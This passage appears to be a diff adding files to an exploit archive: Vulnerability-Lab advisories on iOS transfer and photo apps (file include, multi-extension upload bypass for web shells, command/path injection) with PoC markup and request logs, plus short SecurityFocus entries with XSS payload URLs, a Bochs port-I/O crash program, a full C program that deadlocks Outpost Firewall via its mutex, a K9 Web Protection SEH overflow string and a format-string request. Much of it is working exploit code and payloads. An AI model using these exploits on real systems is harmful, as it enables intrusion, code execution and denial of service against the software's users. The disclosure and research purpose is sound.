PoC Source: Persistent Input Validation Vulnerability - Ordnername (Foldername)
<body>
<h2>?/</h2><br><a href="http://localhost:8080/Clip-Archiv/">Clip-Archiv/</a>
<br><a href="http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">>"
<<>"<[PERSISTENT INJECTED SCRIPT CODE!]">/</a>
<br><a href="/Schnellstart.txt">Schnellstart.txt</a>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure encode and parse of the filename and the connected path value.
1.2
to fix the arbitrary file upload vulnerability it is required to restrict with a filter mechanism the filename extensions.
Disallow multiple extensions and setup and own exception-handling to prevent arbitrary file uploads and restricted file upload bypass.
1.3
To patch the persistent input validation web vulnerability parse and encode the `Ordername` (foldername) input values
in the import, add and rename function.
Filter and encode also the vulnerable output section of the malicious injected test values.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.4(+).
1.2
The security risk of the arbitrary file upload and upload restriction bypass vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.8(+).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

347
platforms/hardware/webapps/30215.txt Executable file
View file

@ -0,0 +1,347 @@
Document Title:
===============
Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1166
Release Date:
=============
2013-12-10
Vulnerability Laboratory ID (VL-ID):
====================================
1166
Common Vulnerability Scoring System:
====================================
8.8
Product & Service Introduction:
===============================
Download the photos & videos from your iPhones Library to computer / PC;Upload photos & videos from your computer;
Transfer photos in full resolution in *.png, *.jpg, *.zip formats;No limit of the number, size or quality of the
transferred photos;Photo Video Album Transfer is a multifunctional and easy-to-use app. It allows to transfer
photos and videos from iPhone to iPhone, from iPhone to computer and reverse. Now you can easily manage your
photo or video transfer and forget about cables, additional hardware and expensive programs. Transfer any number
of photos and videos using this irreplaceable application for iPhone.
(Copy of the Homepage: https://itunes.apple.com/en/app/photo-video-album-transfer/id682294794 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Photo Video Album Transfer - Mobile Application (Igor Ciobanu) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the vulnerable filename value of the iOS Transfer Utility (web interface) module.
Remote attackers can manipulate the filename value in the POST method request of the browse file upload form to cpmpromise the mobile app.
Remote attackers are able to include own local files by usage of the browse file upload module. The attack vecotor is persistent and the
request method is POST. The file include execute occcurs in the main file dir index list were the filenames are visible listed. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.7(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability in the file name can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
Module: Upload
Input: Browse File
Method: POST
Manual stepst to reproduce the vulnerability ...
1. Install and start the vulnerable mobile application
2. Open the web-server wifi transfer (localhost:8080)
Note: Start to tamper the browser (http) request and response session of the next POST Request
3. Click the browse file to upload button and choose a random file of your local hd
4. Change in the POST method request of the upload the filename value and inject your own webshell, remote- or local file
5. The execute after the inject occurs in the main index file dir listing of the iOS Transfer Utility
6. Successful reproduce of the remote vulnerability!
PoC: Index File Dir List - iOS Transfer Utulity (filename)
<input name="file[]" accept="image/jpeg, image/png, video/quicktime, video/x-msvideo, video/x-m4v,
video/mp4" multiple="" type="file"></label><label><input name="button" id="button" value="Submit" type="submit"></label></form><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br></td></tr>
<tr><td> <%20../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]"></td><td> 0.1 Kb</td><td>08.12.2013 15:58</td></tr>
<tr style='height: 180px;'><td style="text-align: center;" > <a href="IMG_0556_th.png"><img src="IMG_0556_th.png"
height="110px" style="max-width: 110px"><br>IMG_0556_th.png</a><br> 2.9 Kb</td>
</table>
<input type="hidden" value="numberOfAvailableFiles=IMG_0556_th.png,endOFF"/><br>
</div>
</body></html></iframe></td></tr></tbody></table></div></body></html>
--- PoC Session Request Logs ---
Status: 200[OK]
POST http://192.168.2.106:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[59002] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Post Data:
POST_DATA[-----------------------------1863134445217
Content-Disposition: form-data; name="file[]"; filename="<../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]>"
Content-Type: image/png

Status: 200 OK
GET http://192.168.2.106:8080/a Load Flags[LOAD_DOCUMENT_URI ]
Content Size[0] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[So., 08 Dez. 2013 14:58:35 GMT]
1.2
The arbitrary file upload and restricted upload bypass vulnerability can be exploited by remote attackers without privileged web-application
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
PoC:
<body><div class="header" id="header">
</div>
<div class="container" id="container"><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br>
</td></tr><tr style="height: 180px;">
<td style="text-align: center;"> <a href="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]">
<img src="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]>"
style="max-width: 110px" height="110px"><br><iframe src="a"></a><br> 0.1 Kb</td>
<td style="text-align: center;" > <a href="IMG_0441.MOV"><img src="IMG_0441_th.png" height="110px" style="max-width: 110px">
<br>IMG_0441.MOV</a><br>657665.1 Kb</td>
</table>
--- PoC Session Logs ---
Status: 200[OK]
GET http://192.168.2.106:8080/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[58702] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[58702]
Date[So., 08 Dez. 2013 15:34:33 GMT]
16:30:12.476[313ms][total 313ms]
Status: 200[OK]
GET http://192.168.2.106:8080/file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]
Load Flags[VALIDATE_ALWAYS ]
Content Size[124] Mime Type[:image/jpeg]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Content-Disposition[:attachment; filename="file.jpg.gif.js.html.php.gif.jpg"]
Content-Length[124]
Accept-Ranges[bytes]
Content-Type[:image/jpeg]
Date[So., 08 Dez. 2013 15:34:33 GMT]
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure filter mechanism and exception-handlign to prevent code execution via
filename value.
1.2
Restrict and filter the filename input value in the upload POST method request to ensure the right format is attached.
Restrict the image file access right to view only ;)
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical because of the location in the main filename value.
1.2
The security risk of the arbitrary file upload web vulnerability and restricted upload bypass bug is estimated high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

7
platforms/jsp/webapps/30189.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24476/info
Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/jsp-examples/snp/snoop.jsp;[xss]

7
platforms/jsp/webapps/30191.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24480/info
Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to launch cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/some_app.jsf?autoscroll=[javascript]

23
platforms/linux/dos/30110.c Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/24246/info
Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation.
A local attacker can exploit these issues to execute arbitrary code in the context of the affected application or to cause denial-of-service conditions. Failed exploit attempts of the buffer-overflow vulnerability will also result in denial-of-service conditions.
#include <sys/io.h>
int main(int argc, char **argv) {
iopl(3);
outw(0x5292, 0x24c);
outw(0xffff, 0x245);(a)
outw(0x1ffb, 0x24e);
outb(0x76, 0x241);
outb(0x7b, 0x240);
outw(0x79c4, 0x247);
outw(0x59e6, 0x240);
return 0;
}
(a) <- TXCNT is inserted here.

7
platforms/linux/remote/30142.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24291/info
GDB is prone to a buffer-overflow vulnerability because it fails to properly check bounds when handling specially crafted executable files.
Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution.
http://www.exploit-db.com/sploits/30142.zip

27
platforms/linux/remote/30186.txt Executable file
View file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/24436/info
Firebird SQL is prone to a remote buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary machine code in the context of the affected database server. Failed exploit attempts will likely crash the server, denying service to legitimate users.
Firebird SQL 2.0 is vulnerable; previous versions may also be affected.
typedef struct p_cnct
{
P_OP p_cnct_operation; /* OP_CREATE or OP_OPEN */
USHORT p_cnct_cversion; /* Version of connect protocol */
P_ARCH p_cnct_client; /* Architecture of client */
CSTRING p_cnct_file; /* File name */
USHORT p_cnct_count; /* Protocol versions understood */
CSTRING p_cnct_user_id; /* User identification stuff */
struct p_cnct_repeat
{
USHORT p_cnct_version; /* Protocol version number */
P_ARCH p_cnct_architecture; /* Architecture of client */
USHORT p_cnct_min_type; /* Minimum type */
USHORT p_cnct_max_type; /* Maximum type */
USHORT p_cnct_weight; /* Preference weight */
}
p_cnct_versions[10];
} P_CNCT;

111
platforms/multiple/dos/30139.c Executable file
View file

@ -0,0 +1,111 @@
source: http://www.securityfocus.com/bid/24284/info
Outpost Firewall is prone to a local denial-of-service vulnerability.
An attacker can exploit this issue to block arbitrary processes, denying service to legitimate users.
This issue affects Outpost Firewall 4.0 build 1007.591.145 and build 964.582.059; other versions may also be affected.
/*
Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)
Usage:
prog
(the program is executed without special arguments)
Description:
This program calls standard Windows API to open and capture mutex. Then an attempt to create a child process
causes the deadlock. To terminate this testing program and to release the mutex press Ctrl+C.
Test:
Running the testing program.
*/
#include <stdio.h>
#include <windows.h>
#include <ddk/ntapi.h>
void about(void)
{
printf("Testing program for Enforcing system reboot with \"outpost_ipc_hdr\" mutex (BTP00002P004AO)\n");
printf("Windows Personal Firewall analysis project\n");
printf("Copyright 2007 by Matousec - Transparent security\n");
printf("http://www.matousec.com/""\n\n");
return;
}
void usage(void)
{
printf("Usage: test\n"
" (the program is executed without special arguments)\n");
return;
}
void print_last_error()
{
LPTSTR buf;
DWORD code=GetLastError();
if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
{
fprintf(stderr,"Error code: %ld\n",code);
fprintf(stderr,"Error message: %s",buf);
LocalFree(buf);
} else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
return;
}
HANDLE capture_mutex(char *name)
{
wchar_t namew[MAX_PATH];
snwprintf(namew,MAX_PATH,L"%S",name);
UNICODE_STRING uniname;
RtlInitUnicodeString(&uniname,namew);
OBJECT_ATTRIBUTES oa;
InitializeObjectAttributes(&oa,&uniname,OBJ_CASE_INSENSITIVE | OBJ_OPENIF,0,NULL);
HANDLE mutex;
DWORD access=MUTANT_ALL_ACCESS;
NTSTATUS status=ZwOpenMutant(&mutex,access,&oa);
if (!NT_SUCCESS(status)) return 0;
printf("Mutex opened.\n");
if (WaitForSingleObject(mutex,5000)==WAIT_OBJECT_0) return mutex;
ZwClose(mutex);
return NULL;
}
int main(int argc,char **argv)
{
about();
if (argc!=1)
{
usage();
return 1;
}
while (1)
{
HANDLE mutex=capture_mutex("\\BaseNamedObjects\\outpost_ipc_hdr");
if (mutex)
{
printf("Mutex captured.\n"
"Running system shell. This action will block the system.\n");
WinExec("cmd",SW_NORMAL);
} else
{
fprintf(stderr,"Unable to capture \"outpost_ipc_hdr\" mutex.\n");
break;
}
}
printf("\nTEST FAILED!\n");
return 1;
}

30
platforms/multiple/dos/30163.html Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/24373/info
K9 Web Protection is prone to a buffer-overflow vulnerability because it fails to perform sufficient boundary checks on user-supplied data before copying it to a buffer.
An attacker could leverage this issue to execute arbitrary code with administrative privileges. A successful exploit could result in the complete compromise of the affected system.
K9 Web Protection 3.2.36 is reported vulnerable; other versions may be affected as well.
<html>
<head>
<title>CSIS.DK - BlueCoat K9 Web Protection Overflow</title>
<center>
</center>
</head>
<body>
<h4><center> Discovery and Exploit by Dennis Rand - CSIS.DK</h4></center>
<br><b>http://127.0.0.1:2372/home.html[Ax168][DCBA][A x 56][BBBB][AAAA] </b><br>
<br><li> Return Address = DCBA
<br><li> Pointer to the next SEH record = BBBB
<br><li> SE Handler = AAAA
<br>
<center>
<b><A
HREF="http://127.0.0.1:2372/home.htmlAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCC
CDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGHHHHHHHHHHHH
HHHHaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbccccccccDCBAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCC
CCCCCCCCCCCCCDDDDDDDDaaaabbbb">RUN PoC</A></b>
</center>
</body>
</html>

11
platforms/multiple/dos/30187.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/24454/info
Mbedthis AppWeb is prone to a format-string vulnerability because the application fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
This issue affects only applications that were built with logging enabled and installed with no "ErrorLog" directive in 'appweb.conf'.
Successful exploits may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely crash the application, denying further service to legitimate users.
AppWeb 2.2.2 is reported vulnerable; other versions may also be affected.
'GET %n://localhost:80/" request'

245
platforms/multiple/local/30183.txt Executable file
View file

@ -0,0 +1,245 @@
Document Title:
===============
Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1165
Release Date:
=============
2013-12-09
Vulnerability Laboratory ID (VL-ID):
====================================
1165
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
View your entire photo library in a standard web browser! Show off your photos easily! Excellent for showing slides
during a meeting, browsing through friends photos and more!
- View your photos in a browser over WiFi
- Optional password protection
- Show albums, events, faces (your photo library needs to have these albums in order to show it)
- One click slideshows
- Easy navigation
- Supports bonjour publishing
(Copy of the Homepage: https://itunes.apple.com/app/id499204622 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
SharkFood
Product: Air Gallery - Air Photo Browser iOS 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local command/path injection web vulnerabilities has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The vulnerability is located in the vulnerable `devicename` value of the file dir und sub category `header` (header-title) section. Local attackers are
able to inject own malicious system specific commands or path value requests as the physical iOS hardware devicename. The execute of the injected
command or path request occurs with persistent attack vector in the index and sub category list of the web interface. The security risk of the local
command/path inject vulnerability is estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6.
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execute of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Content > header-title
Vulnerable Parameter(s):
[+] devicename
Affected Module(s):
[+] Index- File Dir Listing
[+] Sub Folder/Category - File Dir Listing
1.2
A local command/path injection web vulnerability has been discovered in the SharkFood Air Gallery 1.0 Air Photo Browser mobile application for Apple iOS.
A local command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
The second local command/path inject vulnerability is located in the in the album name value of the web-interface index and sub category list module.
Local attackers are able to manipulate iOS device `photo app` (default) album names by the inject of a payload to the wrong encoded albumname input fields.
The execute of the injected command/path request occurs in the album sub category list and the main album name index list. The security risk of the
command/path inject vulnerabilities are estimated as high(-) with a cvss (common vulnerability scoring system) count of 6.6(+).
Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction.
Successful exploitation of the vulnerability results unauthorized execution of system specific commands or unauthorized path requests.
Vulnerable Module(s):
[+] Poster > group-header > groupinfo
Vulnerable Parameter(s):
[+] album name
Affected Module(s):
[+] Index - Item Name List
[+] Sub Category - Title List
Proof of Concept (PoC):
=======================
1.1
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the settings menu in the mobile iOS and click the info button to have an influence on the devicename value
3. Now change the local devicename value to your own script code with a frame + local command inject settings or path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via browser the local service, the local command inject or unauthorized path request occurs in the header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Content > header-title > devicename
<div id="wrapper" class="fullSize">
<!-- header -->
<div id="header" class="content">
<span id="header-title">Air Photo Browser - devicename bkm?37 >"<<>"x<../[COMMAND/PATH INJECT VULNERABILITY!]></span></div>
<!-- column layout , thanks to Mattew James Tailor! - http://matthewjamestaylor.com/ --> ;)
<div class="colmask leftmenu" id="content-wrapper">
<div class="colright">
<div class="col1wrap">
<!-- right column -->
<div class="col1">
<div style="" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="images/placeholder.png">
<h3 id="group-info"></h3>
</div>
1.2
The local command/path inject web vulnerability can be exploited by local attackers with restricted or low privileged device user account
without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.
1. Install the vulnerable mobile application to your ios device (iphone, mac or ipad)
2. Open the default photo app in the mobile iOS and click the edit or add button to have an influence on the local albumname value
Note: Now the attackers is able to change an exisiting albumname or can add a new album (name)
3. Include your own script code with a frame + local command inject settings or unauthorized path request
4. Save the settings and open the vulnerable mobile application
5. Start the web-server via wifi (standard localhost:8080 passwd:empty)
6. Open with another computer via web-browser the local service (GET method - index)
Note: The local command inject or unauthorized path request occurs in the groupinfo of the group-header section
7. Successful reproduce of the local command/path inject vulnerability!
PoC: Poster > group-header > groupinfo
<div class="col1">
<div style="display: block;" id="group-header" class="content ui-helper-hidden">
<img id="group-poster" class="control-button" src="/api/poster/?group=0&subgroup=0">
<h3 id="group-info"><b>Photo Library</b> <span id="group-count">0 photos</span></h3>
</div><div style="height: 380.6px;" id="group-content" class="content airGallery">
There are no photos in this album</div>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The first local command/path inject web vulnerability can be patched by a secure encode and parse of the vulnerable devicename value in
the web interface header section.
1.2
The second local command/path inject web vulnerability can be patched by a secure parse of the vulnerable albumname value
in the web interface data context listing section.
Security Risk:
==============
1.1
The security risk of the local command/path inject web vulnerability is estimated as high(-).
Local attackers are able to inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
1.2
The security risk of the second local command/path inject web vulnerability is estimated as high(-). Local attackers are able to
inject own system specific commands but can also unatuhorized request local system path values to
compromise the apple iOS web-application.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
